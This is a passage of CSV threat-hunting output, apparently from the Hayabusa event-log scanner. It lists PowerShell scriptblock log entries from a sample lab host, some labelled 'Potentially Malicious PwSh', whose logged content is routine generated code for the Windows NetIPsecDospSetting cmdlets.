= $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterEx",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.779 
+09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"emptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { 
[object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' -Alias '*' function Remove-NetIPsecDospSetting { [Cmdlet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"emptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = 
${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; 
Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' -Alias '*' function Remove-NetIPsecDospSetting { [Cmdlet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Binding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } 
$__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Binding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, 
Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, 